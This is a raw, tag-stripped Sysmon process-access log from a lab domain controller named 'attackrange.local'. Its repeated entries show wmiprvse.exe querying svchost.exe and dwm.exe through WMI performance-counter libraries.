13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005081Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005080Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005079Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005078Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005077Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005076Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005075Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005074Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005073Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005072Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005071Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005070Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005069Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005068Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005067Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005066Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 